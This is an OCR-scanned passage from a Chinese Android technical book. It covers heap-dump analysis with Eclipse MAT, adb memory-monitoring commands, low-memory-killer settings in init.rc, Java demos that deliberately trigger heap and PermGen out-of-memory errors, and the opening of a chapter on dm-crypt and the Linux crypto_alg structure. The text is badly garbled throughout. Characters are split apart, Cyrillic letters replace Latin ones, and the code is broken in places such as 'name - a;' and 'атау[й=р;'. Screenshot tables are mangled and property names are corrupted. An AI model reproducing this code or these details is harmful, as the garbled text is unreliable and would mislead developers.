上 述 代码 的 功能 是 ， 和 希望 在 某 个 按钮 被 单 击 时 开始 抓 取 内 存 使 用 信息 ， 并 保存 在 指定 的 位 置 
/data/temp/myapp.hprof， 这 样 就 没有 权限 的 限制 了 ， 而 且 也 无 需 用 sdcard。 但 是 这 样 做 的 前 提 是 要 保证 
/data/temp 目录 是 存在 的 。 这 个 路 径 可 以 自己 定义 ， 当 然 也 可 以 写成 sdcard 当中 的 某 个 路 径 。 


2. 使 用 MAT 导入 .hprof 文件 


如 果 是 Eclipse 自动 生成 的 .hprof 文件 ， 则 可 以 使 用 MAT 插件 直接 打开 可 能 是 比较 新 的 ADT 才 支 
FF) 。 如 果 Eclipse 自动 生成 的 .hprof 文件 不 能 被 MAT 直接 打开 ,或 者 是 使 用 android.os.Debug.dumpHprofData() 
方法 手动 生成 的 .hprof 文件 ， 则 需要 将 .hprof 文件 进行 转换 。 为 了 讲解 具体 的 转换 方法 ， 下 面 举 一 个 例子 ， 
例如 ,将 .hprof 文件 复制 到 PC 上 的 /ANDROID_SDK/tools 目录 下 ,并 输入 命令 hprofconv xxx.hprof yyy.hprof, 
其 中 xxx.hprof 表示 原始 文件 , yyy.hprof 为 转换 过 后 的 文件 ,转换 过 后 的 文件 自动 放 在 /ANDROID_SDK/tools 
目录 下 。 到 此 为 止 ，.hprof 文件 处 理 完毕 ， 此 时 就 可 以 用 来 分 析 内 存 泄漏 情况 了 。 

在 Eclipse 中 依次 选择 Windows/Open Perspective/Other/Memory Analyzer 命令 ， 或 者 打开 Memory 
Analyzer Tool 的 RCP。 在 MAT 中 选择 File/Open File， 浏 览 并 导入 刚刚 转换 得 到 的 .hprof 文件 。 


3. 使 用 MAT 的 视图 工具 分 析 内 存 


导入 .hprof 文件 以 后 ，MAT 会 自动 解析 并 生成 报告 ， 单 击 Dominator Tree， 并 按照 Package 分 组 ， 选 择 
自 定义 的 Package 类 然后 右 击 ， 在 弹出 的 快捷 菜单 中 依次 选择 List objects | With incoming references 命令 。 
这 时 会 列 出 所 有 可 疑 类 ， 右 击 某 一 项 ， 并 依次 选择 Path to GC Roots | exclude weak/soft references 命令 ,会 
进一步 筛选 出 与 程序 相关 的 所 有 有 内 存 泄 漏 的 类 。 据 此 ， 可 以 追踪 到 代码 中 的 某 一 个 产生 泄漏 的 类 。 
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具体 的 分 析 方法 在 此 不 做 说 明了 ， 因 为 在 MAT 的 官方 网 站 和 客户 端的 帮助 文档 中 有 十 分 详尽 的 介绍 。 
了 解 MAT 中 各 个 视图 的 作用 很 重要 ， 例 如 www.eclipse.org/mat/about/screenshots.php 中 介绍 的 。 

总 之 ， 使 用 MAT 分 析 内 存 及 查找 内 存 泄 漏 的 根本 思路 ， 就 是 找到 哪个 类 的 对 象 的 引用 没有 被 释放 ， 找 
到 没有 被 释放 的 原因 ， 也 就 可 以 很 容易 地 定位 代码 中 的 哪些 片段 的 逻辑 有 问题 了 。 

另外 ， 在 测试 过 程 中 首先 需要 分 析 如 何 操作 一 个 应 用 会 产生 内 存 泄漏 ， 然 后 在 不 断 的 操作 中 抓 取 该 进 
程 产生 的 .hprof 文件 ， 使 用 MAT 工具 分 析 。 目 前 查看 内 存 、 分 析 内 存 泄 漏 还 有 以 下 几 种 方法 。 

A) 使 用 top 命令 查看 某 个 进程 的 内 存 。 例 如 ， 创 建 一 个 脚本 文件 music.sh， 该 文件 的 内 容 是 指定 程 
序 每 隔 一 秒 钟 输出 某 个 进程 的 内 存 使 用 情况 ， 在 此 具体 实现 如 下 。 

#!/bin/bash 

while true; do 

adb shell procrank | grep "com.android.music" 


sleep 1 
done 

并 且 配 合 使 用 procrank 工具 可 以 查看 music 进程 每 一 秒 钟 内 存 使 用 情况 。 
(20 另外 ， 使 用 top 命令 也 可 以 查看 内 存 。 

adb shell top -m 10// 查 看 使 用 资源 最 多 的 10 个 进程 

adb shell top|grep com.android.music// 查 看 music 进程 的 内 存 


(3) free 命令 。 

free 命令 用 来 显示 内 存 的 使 用 情况 ， 使 用 权限 是 所 有 用 户 ， 格 式 如 下 。 
free [-b|-k|-m] [-o] [-s delay] [-t] [-V] 

а -b/k-m: 表示 分 别 以 字 节 (KB, MB) 为 单位 显示 内 存 使 用 情况 。 
O -sdelay: 显示 每 隔 多 少 秒 显 示 一 次 内 存 使 用 情况 。 

О -t:， 显 示 内 存 总 和 列 。 

О о: 不 显示 缓冲 区 调节 列 。 


5.5.6 Android (Java) 中 常见 的 容易 引起 内 存 泄漏 的 不 良 代码 


Android 主要 应 用 在 嵌入 式 设备 当中 ， 而 嵌入 式 设备 由 于 一 些 条 件 限制 ， 通 常 不 会 有 很 高 的 配置 特别 
是 内 存 是 比较 有 限 的 。 如 果 编 写 的 代码 中 有 太 多 对 内 存 使 用 不 当 的 地 方 ， 难 免 会 使 设备 运行 缓慢 ， 甚 至 是 
死机 。 为 了 能 够 使 Android 应 用 程序 安全 且 快 速 地 运行 , Android 的 每 个 应 用 程序 都 会 使 用 一 个 专 有 的 Dalvik 
虚拟 机 实例 来 运行 ， 它 是 由 Zygote 服务 进程 孵化 出 来 的 ， 也 就 是 说 每 个 应 用 程序 都 是 在 属于 自己 的 进程 中 
运行 的 。 一 方面 ， 如 果 程 序 在 运行 过 程 中 出 现 了 内 存 泄 漏 的 问题 ， 仅 仅 会 使 自己 的 进程 被 kill 掉 ， 而 不 会 影 
响 其 他 进程 (如 果 是 system_process 等 系统 进程 出 问题 的 话 ， 则 会 引起 系统 重启 ) ; 另 一 方面 ，Android 为 
不 同类 型 的 进程 分 配 了 不 同 的 内 存 使 用 上 限 ， 如 果 应 用 进程 使 用 的 内 存 超过 了 这 个 上 限 ， 则 会 被 系统 视 为 
内 存 泄漏 ， 从 而 被 kill i. Android 为 应 用 进程 分 配 的 内 存 上 限 保存 在 ANDROID SOURCE/system/core/ 
rootdir/init.re 脚本 中 ， 例 如 下 面 的 部 分 脚本 代码 : 
# Define the oom adj values for the classes of processes that can be 
# killed by the kernel. These are used in ActivityManagerService. 
setprop ro.FOREGROUND APP ADJ 0 
setprop ro. VISIBLE APP ADJ 1 
setprop ro.SECONDARY SERVER ADJ 2 
setprop ro.BACKUP APP ADJ2 
setprop ro.HOME APP ADJ 4 
setprop ro.HIDDEN APP MIN ADJ 7 
setprop ro. CONTENT PROVIDER АР.) 14 
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setprop ro.EMPTY APP ADJ 15 
3t Define the memory thresholds at which the above process classes will 
# be killed. These numbers are in pages (4k) 
setprop ro.FOREGROUND APP MEM 1536 
setprop ro. VISIBLE APP MEM 2048 
setprop ro.SECONDARY SERVER MEM 4096 
setprop ro.BACKUP APP MEM 4096 
setprop ro.HOME APP MEM 4096 
setprop ro.HIDDEN APP MEM 5120 
setprop ro. CONTENT PROVIDER MEM 5632 
setprop ro.EMPTY APP MEM 6144 
3t Write value must be consistent with the above properties 
3t Note that the driver only supports 6 slots, so we have HOME APP at the 
# same memory level as services 
write /sys/module/lowmemorykiller/parameters/adj 0,1,2,7,14,15 
write /proc/sys/vm/overcommit memory 1 
write /proc/sys/vm/min free order shift 4 
write /sys/module/lowmemorykiller/parameters/minfree 1536,2048,4096,5120,5632,6144 
# Set init its forked children's oom adj. 
write /proc/1/oom adj -16 
正 因为 应 用 程序 能 够 使 用 的 内 存 有 限 ， 所 以 在 编写 代码 时 需要 特别 注意 内 存 使 用 问题 。 如 下 是 一 些 常 
见 的 内 存 使 用 不 当 的 情况 。 


5.5.7 ”使 用 MAT 根据 heap dump 分 析 内 存 泄漏 的 根源 


在 接 下 来 的 内 容 中 ， 将 介绍 MAT 如 何 根据 heap dump 分 析 泄漏 根源 。 因 为 绝 大 多 数 Android 应 用 程序 
是 用 Java 语言 编写 的 ， 所 以 本 小 节 先 用 一 段 Java 代码 来 测试 内 存 汇 漏 。 这 段 测试 代码 非常 简单 ， 很 容易 找 
出 问题 ， 希 望 读者 能 够 借 此 举一反三 。 

首先 介绍 ClassLoader, 本 质 上 , 其 工作 就 是 把 磁盘 上 的 类 文件 读 入 内 存 , 然后 调用 java.lang.ClassLoader. 
defineClass 告诉 系统 把 内 存 镜像 处 理 成 合法 的 字 节 码 。Java 提供 了 抽象 类 ClassLoader， 所 有 用 户 自 定义 类 
装载 器 都 实例 化 自 ClassLoader 的 子 类 。system class loader 在 没有 指定 装载 器 的 情况 下 默认 装载 用 户 类 ， 在 
Sun Java 1.5 中 即 sun.misc.LauncherSAppClassLoader。 

(1) 准备 heap dump 

请 看 下 面 Pilot 类 的 演示 代码 。 

package org.rosenjiang.bo; 

public class Pilot 

String name; 
int age; 


public Pilot(String a, int bX 
name - a; 
age = b; 
} 
} 
然后 再 看 类 OOMHeapTest 是 如 何 撑 破 heap dump 的 。 
package org.rosenjiang.test; 


import java.util.Date; 


(us, 
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import java.util.HashMap; 
import java.util.Map; 
import org.rosenjiang.bo.Pilot; 


public class OOMHeapTest{ 
public static void main(String[ ] args)( 
oom(); 


) 


private static void oom()( 
Map<String, Pilot» map = new HashMap<String, Pilot>(); 
Object[ ] array = new Object[1000000]; 
for(int i=0; i<1000000; i++){ 
String d = new Date().toString(); 
Pilot p = new Pilot(d, i); 
map.put(i+"rosen jiang", p); 
атау[й=р; 
} 
} 


} 

在 上 面 构造 了 很 多 的 Pilot 类 实例 ,然后 向 数组 和 map 中 存放 。 由 于 是 Strong Ref, GC 自然 不 会 回收 这 
些 对 象 ， 一 直 放 在 heap 中 直到 溢出 。 当 然 在 运行 前 ， 先 要 在 Eclipse 中 配置 VM 参数 -XX:+HeapDump- 
OnOutOfMemoryError。 稍 后 内 存 溢 出 ， 控 制 台 显示 如 下 信息 。 

java.lang.OutOfMemoryError: Java heap space 

Dumping heap to java_pid3600.hprof 

Heap dump file created [78233961 bytes in 1.995 secs] 

Exception in thread "main" java.lang.OutOfMemoryError: Java heap space 

文件 java_pid3600.hprof 就 是 需要 的 heap dump, 读者 可 以 在 OOMHeapTest 类 所 在 的 工程 根 目录 下 找到 。 

(2) 使 用 MAT 
使 用 MAT 解析 .hprof 文件 ， 弹 出 向 导 后 直接 单 击 Finish 按钮 会 看 到 如 图 5-12 所 示 的 界面 。 
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5-12 MAT 解析 界面 
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由 此 可 见 ， 通 过 使 用 МАТ 工具 分 析 了 heap dump 后 ， 会 在 界面 上 非常 直观 地 展示 一 个 饼 图 ， 该 图 深 色 
区 域 被 怀疑 有 内 存 泄漏 。 可 以 发 现 整个 heap 只 有 64M 内 存 ， 深 色 区 域 就 占 了 99.5%。 接 下 来 是 一 个 简短 的 
描述 ， 显 示 main0) 线 程 占用 了 大 量 内 存 ， 并 且 明 确 指出 system class loader 加 载 的 java.lang.Thread 实例 有 内 
存 聚集 ， 并 建议 用 关键 字 java.lang. Thread 进行 检查 。 所 以 ，MAT 通过 简单 的 两 句 话 就 说 明了 问题 所 在 ， 即 
便 使 用 者 没有 处 理 内 存 问题 的 经 验 。 在 下 面 还 有 一 个 Details 超 链接 ， 在 单 击 之 前 不 妨 考虑 一 个 问题 : 为 何 
对 象 实例 会 聚集 在 内 存 中 ， 为 何 存活 〈 而 未 被 GC) ? 是 因为 Strong Ref， 如 图 5-13 所 示 。 
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图 5-13 Details 界面 


由 此 可 见 ， 单 击 了 Details 超 链 接 之 后 ， 除 了 在 上 一 界面 看 到 的 描述 外 ， 还 有 Shortest Paths To the 
Accumulation Point 和 Accumulated Objects 部 分 ， 这 里 说 明了 从 GC root 到 聚集 点 的 最 短路 径 ， 以 及 完整 的 
reference chain。 观 察 Accumulated Objects 部 分 ,java.util.HashMap 和 java.lang.Object[1000000] 实 例 的 retained 
heap(size) 最 大 ，retained heap 代表 从 该 类 实例 沿 着 reference chain 往 下 所 能 收集 到 的 其 他 类 实例 的 shallow 
heap(size) 总 和 , 所 以 明显 类 实例 都 聚集 在 HashMap 和 Object 数组 中 了 。 这 里 发 现 一 个 有 趣 的 现象 , 即 Object 
数组 的 shallow heap 和 retained heap 一 样 ， 数 组 的 shallow heap 和 一 般 对 象 〈 非 数组 ) 不 同 ， 依 赖 于 数组 的 
长 度 和 其 中 元 素 的 类 型 ， 对 数组 求 shallow heap， 也 就 是 求 数组 集合 内 所 有 对 象 的 shallow heap 之 和 。 接 下 
来 再 来 看 org.rosenjiang.bo.Pilot 对 象 实例 的 shallow heap 为 何 是 16, 因为 对 象 头 是 8 FW, 成 员 变 量 int 是 4 
FAW. String 引用 是 4 字 节 ， 所 以 总 共 16 字 节 。 

接 下 来 再 来 看 Accumulated Objects by Class 区 域 ， 如 图 5-14 所 示 。 


Accumulated Objects by Class 


Label Number Of Objects Used Heap Size Retained Heap Size 
[c) ora.roseniiana.bo.Pilot 290,235 4,643,760 32,506,320 
Д iava.utiLHashMap. 1 40 29,951,768 
[9 iava.lang.Obiect] 1 4,000,016 4,000,016 
lc) iava.lang.Strina[ 38 1,200 1,200 
Д2 iava.lang.ThreadLocalsThreadLocalMag. 2 ав 368 
J) sun.utiLcalendar.GregoriansDate 1 эв 96 
Д2 java.lang.StringBuilder 1 16 вв 
@ iava.securitv.AccessControlContext 1 24 24 
D shadl 1 24 24 
@ iava.lana.Obiect 1 8 8 
Д2 iava.lana.Class. 1 ° в 
Z Total: 11 entries 290,283 8,645,232 66,459,912 


图 5-14 Accumulated Objects by Class 区 域 


顾名思义 ， 在 Accumulated Objects by Class 区 域 能 找到 被 聚集 的 对 象 实例 的 类 名 。 此 处 的 类 
org.rosenjiang.bo.Pilot 是 头条 ， 被 实例 化 了 290325 次 ， 再 返回 去 看 程序 ， 其 实 是 笔者 故意 为 之 。 还 有 很 多 有 
用 的 报告 可 用 来 协助 分 析 问题 ， 只 是 本 文中 的 例子 太 简单 ， 所 以 也 用 不 上 。 

(3) perm gen 

perm gen 是 一 个 异类 ， 在 里 面 存储 了 类 和 方法 数据 (与 class loader AX) 以 及 interned strings CFR 
驻 留 ) 。 在 heap dump 中 没有 包含 太 多 的 perm gen 信息 ， 那 么 就 用 这 些 少量 的 信息 来 解决 问题 吧 。 请 读者 
看 下 面 的 代码 ， 利 用 interned strings 把 perm gen ERE. 

package org.rosenjiang.test; 

public class OOMPermTest { 

public static void main(String[ ] args)( 


oom(); 
) 
private static void oom()( 
Object[] array = new Object[10000000]; 
for(int i=0; i<10000000; ї++){ 
String d = String.valueOf(i).intern(); 
апау[]=а; 
} 
} 


} 

控制 台 会 打印 如 下 的 信息 ， 然 后 把 java_pid1824.hprof 文件 导入 到 MAT。 其 实在 MAT 里 ， 看 到 的 状况 
应 该 和 OutOfMemoryError: Java heap space 相似 (用 了 数组 ) ， 因 为 heap dump 并 没有 包含 interned strings 
方面 的 任何 信息 。 只 是 在 这 里 需要 强调 ， 使 用 intern() 方 法 时 应 该 多 加 注意 。 

java.lang.OutOfMemoryError: PermGen space 

Dumping heap to java pid1824.hprof 

Heap dump file created [121273334 bytes in 2.845 secs] 

Exception in thread "main" java.lang.OutOfMemoryError: PermGen space 

开始 思考 如 何 把 class loader 撑 破 ， 经 过 尝试 会 发 现 使 用 ASM 来 动态 生成 类 才能 达到 目的 。ASM 
(http://asm.objectweb.org ) 的 主要 作用 是 处 理 已 编译 类 (compiled class) ， 能 对 已 编译 类 进行 生成 、 转 换 和 
分 析 功 能 之 一 是 实现 动态 代理 ) ， 而 且 运 行 起 来 足够 快 ， 文 档 全 面 。ASM 提供 了 core API fil tree API, 
前 者 是 基于 事件 的 方式 ， 后 者 是 基于 对 象 的 方式 ， 类 似 于 XML 的 SAX, DOM 解析 ， 但 是 使 用 tree API 性 
能 会 有 损失 。 到 此 为 止 已 编译 类 的 结构 如 下 。 

О 修饰 符 ( 例 如 public、private》、 类 名 、 父 类 名 、 接 口 和 annotation 部 分 。 

口 类 成 员 变 量 声 明 ， 包 括 每 个 成 员 的 修饰 符 、 名 字 、 类 型 和 annotation。 

O “方法 和 构造 函数 描述 ， 包 括 修饰 符 、 名 字 、 返 回 和 传 入 参数 类 型 以 及 annotation。 当 然 还 包括 这 些 

方法 或 构造 函数 的 具体 Java 字 节 码 。 

О 常量 池 (constant pool) 部 分 ，constant pool 是 一 个 包含 类 中 出 现 的 数字 、 字 符 串 、 类 型 常量 的 数组 。 

己 编 译 类 和 原来 的 类 源码 区 别 在 于 ， 已 编译 类 只 包含 类 本 身 ， 内 部 类 不 会 在 已 编译 类 中 出 现 ， 而 是 生 
成 另外 一 个 已 编译 类 文件 , 已 编译 类 中 没有 注释 ; 已 编译 类 没有 package 和 import 部 分 。 这 里 还 得 着 重 介绍 
-下 已 编译 类 对 Java 类 型 的 描述 ， 对 于 原始 类 型 由 单个 大 写字 母 表示 ，Z 代表 boolean. C 代表 char, B 代 
Ж byte. S 代表 short、I 代表 int, F 代表 float. J 代表 long, D 代表 double; 而 对 类 类 型 的 描述 使 用 内 部 名 
(internal name) SMAI L 和 后 面 的 分 号 共同 表示 ， 所 谓 内 部 名 就 是 带 全 包 路 径 的 表示 法 ， 例 如 ，String 
的 内 部 名 是 java/lang/String; 对 于 数组 类 型 ， 使 用 单方 括号 加 上 数据 元 素 类 型 的 方式 描述 。 最 后 ， 对 于 方法 
的 描述 用 圆 括 号 来 表示 ， 如 果 返 回 是 void， 则 用 V 表示 ， 具 体 参考 图 5-15 所 示 。 
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Java type Type descriptor 
boolean z 

char c 

byte B 

short E] 

int I 

float F 

long J 

double D 

Object Ljava/lang/Object; 
int O п 

Object] 0 | [[Ljava/lang/0bject; 


图 5-15 Java 类 型 的 描述 


而 在 下 面 的 代码 中 会 使 用 ASM core API， 在 此 需要 注意 接口 ClassVisitor 是 核心 ，FieldVisitor、 
MethodVisitor 都 是 辅助 接口 。ClassVisitor 应 该 按照 这 样 的 方式 来 调用 : visit visitSource? visitOuterClass? 
( visitAnnotation | visitAttribute )*( visitlnnerClass | visitField | visitMethod )* visitEnd。 就 是 说 方法 visit 必须 首 
先 调 用 ， 再 调用 最 多 一 次 的 visitSource， 再 调用 最 多 一 次 的 visitOuterClass() 方 法 ， 接 下 来 再 多 次 调用 
visitAnnotation0 和 visitAttribute() 方 法 ， 最 后 多 次 调用 visitInnerClass(), visitField()#l visitMethod() 方 法 。 调 
用 完 后 再 调用 visitEnd() 方 法 作为 结尾 。 

另外 还 需要 注意 ClassWriter 类 ， 该 类 实现 了 ClassVisitor 接口 ， 通 过 toByteArray() 方 法 可 以 把 已 编译 类 
直接 构建 成 二 进 制 形式 。 由 于 要 动态 生成 子 类 ， 所 以 这 里 只 对 ClassWriter 感 兴趣 。 首 先是 抽象 类 原型 。 

package org.rosenjiang.test; 

public abstract class MyAbsClass ( 

int LESS = -1; 

int EQUAL = 0; 

int GREATER = 1; 

abstract int absTo(Object o); 


} 
其 次 是 自 定义 类 加 载 器 ， 因 为 ClassLoader 的 defineClass() 方 法 都 是 protected 的 ， 所 以 要 想 加 载 字 节 数 
组 形式 (因为 toByteArray 了 ) 的 类 ， 只 有 通过 继承 自己 后 再 实现 。 


package org.rosenjiang.test; 


public class MyClassLoader extends ClassLoader ( 

public Class defineClass(String name, byte[ ] b) ( 
return defineClass(name, b, 0, b.length); 

} 

} 

最 后 看 测试 类 的 演示 代码 。 

package org.rosenjiang.test; 

import java.util.ArrayList; 

import java.util.List; 

import org.objectweb.asm.ClassWriter; 

import org.objectweb.asm.Opcodes; 


public class OOMPermTest{ 
public static void main(String[ ] args) ( 
OOMPermTest o = new OOMPermTest(); 
o.oom(); 


(m, 


) 
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private void oom(){ 
try( 

ClassWriter cw = new ClassWriter(0); 
cw.visit(Opcodes.V1 5, Opcodes.ACC PUBLIC + Opcodes.ACC_ABSTRACT, 
"org/rosenjiang/test/MyAbsClass", null, "java/lang/Object", 
new String[ ] }); 
cw.visitField(Opcodes.ACC PUBLIC  Opcodes.ACC FINAL + Opcodes.ACC STATIC, "LESS", "I", 
null, new Integer(-1)).visitEnd(); 
cw.visitField(Opcodes.ACC PUBLIC + Opcodes.ACC FINAL + Opcodes.ACC STATIC, "EQUAL", "I", 
null, new Integer(0)).visitEnd(); 
cw.visitField/Opcodes.ACC PUBLIC + Opcodes.ACC FINAL + Opcodes.ACC_STATIC, "GREATER", "I", 
null, new Integer(1)).visitEnd(); 
cw.visitMethod(Opcodes.ACC PUBLIC * Opcodes.ACC ABSTRACT, "absTo", 
"(Ljava/lang/Object; I", null, null).visitEnd(); 
cw.visitEnd(); 
byte[] b = cw.toByteArray(); 


List<ClassLoader> classLoaders = new ArrayList<ClassLoader>(); 
while (true) ( 
MyClassLoader classLoader = new MyClassLoader(); 
classLoader.defineClass("org.rosenjiang.test.MyAbsClass", b); 
classLoaders.add(classLoader); 
} 
} catch (Exception e) { 
e.printStackTrace(); 
} 
} 


运行 后 控制 台 会 报错 ， 输 出 如 下 信息 。 

java.lang.OutOfMemoryError: PermGen space 

Dumping heap to java_pid3023.hprof 

Heap dump file created [92593641 bytes in 2.405 secs] 

Exception in thread "main" java.lang.OutOfMemoryError: PermGen space 


HH 


文件 java_pid3023.hprof， 如 图 5-16 所 示 。 着重 看 图 中 的 Classes: 88.1k 和 Class Loader: 87.7k 部 分 ， 


从 这 点 可 看 出 class loader 加 载 了 大 量 的 类 。 


D Pilot. java | (7) OOMPermTest. java Х| web.xml 17) MyClassLoader. java | (7) MyAbsClass. java 


i mM T Ki -(£ 5 о, 


3 E default report org eclipse. mat. api: suspects 


i Overview 
~ бе 
Size: 63.5 NB Classes: 88. 1k Objects: 1.8m Class Loader: 8T. Tk Unreachable Objects Histogram 


图 5-16 打开 文件 java_pid3023.hprof 


更 进一步 分 析 ， 需 要 单 击 图 5-16 中 的 按钮 局， 然后 选择 Java Basics—Class Loader Explorer 功能 。 打 开 
后 能 看 到 如 图 5-17 所 示 的 界面 , 第 一 列 是 class loader 名 字 ; 第 二 列 是 class loader 已 定义 类 (defined classes) 


的 个 数 ， 


这 里 要 说 明 一 下 已 定义 类 和 已 加 载 类 (loaded classes) ， 当 需要 加 载 类 时 ， 相 应 的 class loader 会 首 


先 把 请 求 委派 给 父 class loader， 只 有 当 父 class loader 加 载 失 败 后 。 该 class loader 才 会 自己 定义 并 加 载 类 ， 


这 就 是 J 


ava 自己 的 “双亲 委派 加 载 链 ”结构 ， 第 三 列 是 class loader 所 加 载 的 类 的 实例 数目 。 


151 


UU Android REG jo ERR 


i M de Ы-&- Q B-iá- м 
i Overview GB default report org eclipse.mat. api:suspects | 回 clessloaderexplorerquery ГЇ 
Class Mane Defined Cle. 
ЗЬ весе Geic 
国 回 <system class loader? 
® (Gy sun. mise. Launeher$AppClassLoader @ Ox22efeB08 
& [Q ore rosenji ang. test MyClessLoader @ 032290148. 1 ° 
® [Gy parent sun misc. Laumcher$AppClassLoader @ Ox22efe808 n 87,657 
Ө ore. rosenjiang. test. буйый. ° 
У Total: 2 entries 
(Borg rosenjiang test. MyClassLoader Q 0x229«0428 1 
[Q ore rosenjiang. test. ByClessLoader Q 0x229e0708 1 
[£y org rosenjiang test. MyClassLoader @ 012290968 1 
[ org. rosenjiang text. MyClassLoader @ 0x229«0cc8 1 
® (0) ore rosenjiang test. MyClassLoader @ 0522980438 1 
[ ore rosenjiang test. MyClassLoader @ 0х229е1288 1 
[ org rosenjiang test. MyClessLoader @ 0x229e1568 1 
[ org rosenjiang test MyClassLoader @ 0x229e1848 1 
[ org rosenjiang test MyClassLoader @ 0x229elb26 1 
[ оге rosenjiang test.HyClassLoader 8 0x229ele08 1 
& (0 org rosenjiang test. MyClassLoader 8 0x22942048 1 
® [ог rosenjiang test. HyClassLoader 8 Ox229e23c8 1 
1 
1 
1 
1 
1 
1 
1 
1 
1 
o 
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ккк 


[Q ore rosenjiang. test. MyClassLoader @ 0x229e26a6 
[ оге rosenjiang. test. MyClassLoader @ 0x229«2968 
[£y org rosenjiang. test MyClassLoader @ 0x229e2c66 
& [Gj ore rosenjiang test. MyClassLoader @ 0522902648 
[ org rosenjiang test. MyClassLoader Q 02293228 
в [Q ore rosenji eng. test. MyClassLoader @ 052293508. 
8 [Q ore rosenjiang test. tyClessLoader @ 052293768 
® [Q ore. rosenjiang test. MyClassLoader @ 0x229e3ac8 
8 [Qy org rosenjiang test. MyClassLoader @ 0х229е34а8 
J, Total: 24 of 87,659 entries 88, 111 


eee eee 
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图 5-17 Class Loader Explorer 功能 


在 classloaderexplorerquery 面板 中 会 发 现 class loader 是 否 加 载 了 过 多 的 类 。 另 外 还 有 Duplicate Classes 
功能 ， 也 能 协助 分 析 重 复 加 载 的 类 。 在 此 可 以 肯定 的 是 ，MyAbsClass 被 重复 加 载 了 N 多 次 。 

SER: 其 实 MAT 工 具 已 经 非常 强大 了 ， 上 述 演示 根本 用 不 到 MAT 的 其 他 分 析 功 能 。 在 上 述 演示 中 ， 对 
于 OOM 不 只 列举 了 两 种 溢出 错误 ， 还 有 多 种 其 他 错误 ， 但 对 于 perm gen 来 说 ， 如 果实 在 找 不 出 
问题 所 在 ， 建 议 使 用 JIVM 的 -verbose 参 数 ， 该 参数 会 在 后 台 打 印 出 日 志 ， 可 以 用 来 查看 哪个 class 
loader 加 载 了 什么 类 ， 例 如 ，[Loaded org.rosenjiang.testMyAbsClass from org.rosenjiang.test.MyClass 
Loader]. 
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虽然 Android 系统 以 Linux 内 核 为 基础 ， 对 整个 系统 提供 了 一 整套 的 安全 策略 。 但 是 再 安全 的 系统 也 是 
有 漏洞 的 ， 万 一 信息 资料 被 恶意 软件 获取 ， 这 些 信 息 便 毫 无 保留 地 展现 在 黑客 面前 。 为 了 进一步 提高 系统 
的 安全 性 ，Android 系统 提供 了 文件 加 密 功 能 ， 这 样 即使 黑客 获取 了 信息 ， 也 是 被 加 密 的 信息 。 本 章 将 详细 
讲解 Android 系统 实现 文件 加 密 的 基本 知识 ， 为 读者 学 习 本 书后 面 的 知识 打下 基础 。 


6.1 Dmcrypt 加 密 机 制 介绍 


бы 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 6 章 \Dmerypt 加 密 机 制 介绍 .avi 

从 Android 3.0 版 本 开始 ,Android 系统 引入 了 Linux 的 Dmerypt 加 密 机 制 。 通过 这 个 机 制 可 以 对 文件 系 
统 进行 加 密 ， 其 中 ， 原 生 Android 系统 只 支持 对 /data 目录 的 加 密 ， 而 有 些 厂商 对 这 个 默认 目录 进行 了 修改 ， 
从 而 可 以 对 其 他 目录 进行 加 密 处 理 。 在 本 节 的 内 容 中 ， 将 详细 讲解 Dmerypt 加 密 机 制 的 基本 知识 。 


6.1.1 Linux 密码 管理 机 制 


在 Linux 系统 内 核 中 ， 密 码 相关 的 头 文件 被 保存 在 <srcdir>/include/crypto/ 目 录 下 ， 实 现 文件 被 保存 在 
<srcdir>/crypto/ 目 录 下 。 在 接 下 来 的 内 容 中 ， 将 依次 讲解 加 密 算法 、 同 步 块 加 密 和 异步 块 加 密 等 基本 概念 。 


1. 加 密 算法 


所 有 加 密 算法 都 是 以 内 核 模块 方式 编写 的 ， 所 有 内 核 模块 的 代码 都 是 先 从 关键 数据 结构 的 分 析 工 作 开 
始 。 为 了 加 深 对 加 密 算法 的 理解 ， 此 处 从 Linux 内 核 代码 中 选择 一 个 普通 的 加 密 算法 进行 研究 ， 例如， 文件 
<srcdir>/crypto/aes_generic.c 中 对 AES 算法 的 演示 过 程 。 在 文件 <srcdir>/crypto/aes_generic.c H, AES 算法 先 
声明 了 结构 体 crypto_alg， 具 体 代码 如 下 所 示 。 
static struct crypto_alg aes alg ={ 
.cra_name = "aes", 
.cra_driver_name = "aes-generic", 
.cra priority = 100, 
.cra flags = CRYPTO ALG TYPE CIPHER, 
.cra_blocksize = AES BLOCK SIZE, 
.cra_ctxsize = sizeof(struct crypto aes ctx), 
.cra alignmask = 3, 
.cra module = THIS MODULE, 
.cra list = LIST HEAD INIT(aes alg.cra list), 
сга u =í 
.cipher = ( 
.cia min keysize - AES MIN KEY SIZE, 
.cia max keysize = AES MAX KEY SIZE, 
.cia_setkey = crypto aes set key, 
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.cia encrypt = aes encrypt, 
.cia decrypt = aes decrypt 
} 
} 


y 
在 上 述 算法 代码 中 ，alg 是 algorithm 的 缩写 。 在 Linux 内 核 系 统 中 ， 将 所 有 的 加 密 、 哈 希 等 算法 注册 用 
到 数据 结构 都 命名 为 xxx alg 格式 。 在 文件 <srcdir>/include/linux/crypto.h 中 实现 了 crypto_alg 的 完整 定义 ， 
具体 代码 如 下 所 示 。 
struct crypto alg ( 
struct list head cra list; 
structlist head cra users; 
u32 cra flags; 
unsigned int cra blocksize; 
unsigned int cra ctxsize; 
unsigned int cra alignmask; 
int cra priority; 
atomic tcra refcnt; 
char cra name[CRYPTO MAX ALG МАМЕ]; 
char cra driver name[CRYPTO MAX ALG NAME]; 
const struct crypto type *cra type; 
union ( 
struct ablkcipher alg ablkcipher; 
Struct aead alg aead; 
struct blkcipher alg blkcipher; 
struct cipher alg cipher; 
struct compress alg compress; 
struct rng alg mg; 
} cra_u; 
int (*cra init)(struct crypto tfm *tfm); 
void (*cra exit)(struct crypto tfm *tfm); 
void (*cra destroy)(struct crypto alg *alg); 


struct module *cra module; 


: Linux 系统 内 核 中 ，alg 的 主页 成 员 如 下 所 示 。 
name: 算法 名 。 
driver_name: 驱动 名 。 
flags: 算法 类 型 、 同 步 或 异步 。 
blocksize: 分 组 大 小 ， 单 位 为 字 节 。 
ctxsize: 上 下 文大 小 ， 单 位 为 字 节 。 
alignmask: ctx 〈 算 法 上 下 文 ) 的 对 齐 。 
min/max-keysize: 最 小 或 最 大 密 钥 长 度 ， 单 位 为 字 节 。 
inivexit: ttm 的 初始 化 和 销毁 。 
destroy: alg 的 销毁 。 
set_key/encrypt/decrypt: 设置 密 钥 / 加 密 /解密 的 函数 。 
在 上 述 主要 成 员 列 表 中 ， 重 点 介绍 ctk〈 算 法 上 下 文 ) 的 概念 。 上 下 文 是 指 算法 执行 过 程 中 所 要 贯穿 始 
